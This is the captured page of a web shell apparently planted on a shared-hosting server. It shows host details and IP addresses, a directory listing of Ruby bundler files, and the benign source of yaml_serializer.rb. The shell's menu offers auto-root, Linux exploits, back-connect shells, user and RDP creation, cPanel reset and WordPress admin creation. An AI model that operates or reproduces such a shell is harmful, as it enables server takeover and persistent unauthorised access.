Linux server257.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 185.61.153.106 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.33
safeqmlm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby26 /
lib64 /
ruby /
2.6.0 /
bundler /
[ HOME SHELL ]
Name
Size
Permission
Action
cli
[ DIR ]
drwxr-xr-x
compact_index_client
[ DIR ]
drwxr-xr-x
fetcher
[ DIR ]
drwxr-xr-x
installer
[ DIR ]
drwxr-xr-x
plugin
[ DIR ]
drwxr-xr-x
resolver
[ DIR ]
drwxr-xr-x
settings
[ DIR ]
drwxr-xr-x
source
[ DIR ]
drwxr-xr-x
ssl_certs
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
ui
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
build_metadata.rb
1.61
KB
-rw-r--r--
capistrano.rb
879
B
-rw-r--r--
cli.rb
35.12
KB
-rw-r--r--
compact_index_client.rb
3.27
KB
-rw-r--r--
compatibility_guard.rb
518
B
-rw-r--r--
constants.rb
212
B
-rw-r--r--
current_ruby.rb
2.19
KB
-rw-r--r--
definition.rb
36.44
KB
-rw-r--r--
dep_proxy.rb
827
B
-rw-r--r--
dependency.rb
4.43
KB
-rw-r--r--
deployment.rb
3.19
KB
-rw-r--r--
deprecate.rb
876
B
-rw-r--r--
dsl.rb
21.46
KB
-rw-r--r--
endpoint_specification.rb
3.91
KB
-rw-r--r--
env.rb
5.22
KB
-rw-r--r--
environment_preserver.rb
1.31
KB
-rw-r--r--
errors.rb
4.59
KB
-rw-r--r--
feature_flag.rb
3.07
KB
-rw-r--r--
fetcher.rb
10.83
KB
-rw-r--r--
friendly_errors.rb
4.33
KB
-rw-r--r--
gem_helper.rb
5.88
KB
-rw-r--r--
gem_helpers.rb
3.19
KB
-rw-r--r--
gem_remote_fetcher.rb
1.46
KB
-rw-r--r--
gem_tasks.rb
137
B
-rw-r--r--
gem_version_promoter.rb
6.52
KB
-rw-r--r--
gemdeps.rb
423
B
-rw-r--r--
graph.rb
5
KB
-rw-r--r--
index.rb
5.24
KB
-rw-r--r--
injector.rb
8.61
KB
-rw-r--r--
inline.rb
2.33
KB
-rw-r--r--
installer.rb
11.85
KB
-rw-r--r--
lazy_specification.rb
3.62
KB
-rw-r--r--
lockfile_generator.rb
2.18
KB
-rw-r--r--
lockfile_parser.rb
8.62
KB
-rw-r--r--
match_platform.rb
659
B
-rw-r--r--
mirror.rb
5.79
KB
-rw-r--r--
plugin.rb
9.12
KB
-rw-r--r--
process_lock.rb
702
B
-rw-r--r--
psyched_yaml.rb
853
B
-rw-r--r--
remote_specification.rb
3.46
KB
-rw-r--r--
resolver.rb
14.2
KB
-rw-r--r--
retry.rb
1.6
KB
-rw-r--r--
ruby_dsl.rb
761
B
-rw-r--r--
ruby_version.rb
4.96
KB
-rw-r--r--
rubygems_ext.rb
5.88
KB
-rw-r--r--
rubygems_gem_installer.rb
3.49
KB
-rw-r--r--
rubygems_integration.rb
25.01
KB
-rw-r--r--
runtime.rb
10.95
KB
-rw-r--r--
settings.rb
12.38
KB
-rw-r--r--
setup.rb
720
B
-rw-r--r--
shared_helpers.rb
12
KB
-rw-r--r--
similarity_detector.rb
1.84
KB
-rw-r--r--
source.rb
2.66
KB
-rw-r--r--
source_list.rb
5.87
KB
-rw-r--r--
spec_set.rb
5.34
KB
-rw-r--r--
stub_specification.rb
2.78
KB
-rw-r--r--
ui.rb
198
B
-rw-r--r--
uri_credentials_filter.rb
1.2
KB
-rw-r--r--
vendored_fileutils.rb
192
B
-rw-r--r--
vendored_molinillo.rb
100
B
-rw-r--r--
vendored_persistent.rb
1.61
KB
-rw-r--r--
vendored_thor.rb
193
B
-rw-r--r--
version.rb
821
B
-rw-r--r--
version_ranges.rb
2.86
KB
-rw-r--r--
vlad.rb
466
B
-rw-r--r--
worker.rb
2.57
KB
-rw-r--r--
yaml_serializer.rb
2.41
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : yaml_serializer.rb
# frozen_string_literal: true module Bundler # A stub yaml serializer that can handle only hashes and strings (as of now). module YAMLSerializer module_function def dump(hash) yaml = String.new("---") yaml << dump_hash(hash) end def dump_hash(hash) yaml = String.new("\n") hash.each do |k, v| yaml << k << ":" if v.is_a?(Hash) yaml << dump_hash(v).gsub(/^(?!$)/, " ") # indent all non-empty lines elsif v.is_a?(Array) # Expected to be array of strings yaml << "\n- " << v.map {|s| s.to_s.gsub(/\s+/, " ").inspect }.join("\n- ") << "\n" else yaml << " " << v.to_s.gsub(/\s+/, " ").inspect << "\n" end end yaml end ARRAY_REGEX = / ^ (?:[ ]*-[ ]) # '- ' before array items (['"]?) # optional opening quote (.*) # value \1 # matching closing quote $ /xo HASH_REGEX = / ^ ([ ]*) # indentations (.+) # key (?::(?=(?:\s|$))) # : (without the lookahead the #key includes this when : is present in value) [ ]? (?: !\s)? # optional exclamation mark found with ruby 1.9.3 (['"]?) # optional opening quote (.*) # value \3 # matching closing quote $ /xo def load(str) res = {} stack = [res] last_hash = nil last_empty_key = nil str.split(/\r?\n/).each do |line| if match = HASH_REGEX.match(line) indent, key, quote, val = match.captures key = convert_to_backward_compatible_key(key) depth = indent.scan(/ /).length if quote.empty? && val.empty? new_hash = {} stack[depth][key] = new_hash stack[depth + 1] = new_hash last_empty_key = key last_hash = stack[depth] else stack[depth][key] = val end elsif match = ARRAY_REGEX.match(line) _, val = match.captures last_hash[last_empty_key] = [] unless last_hash[last_empty_key].is_a?(Array) last_hash[last_empty_key].push(val) end end res end # for settings' keys def convert_to_backward_compatible_key(key) key = "#{key}/" if key =~ /https?:/i && key !~ %r{/\Z} key = key.gsub(".", "__") if key.include?(".") key end class << self private :dump_hash, :convert_to_backward_compatible_key end end end
Close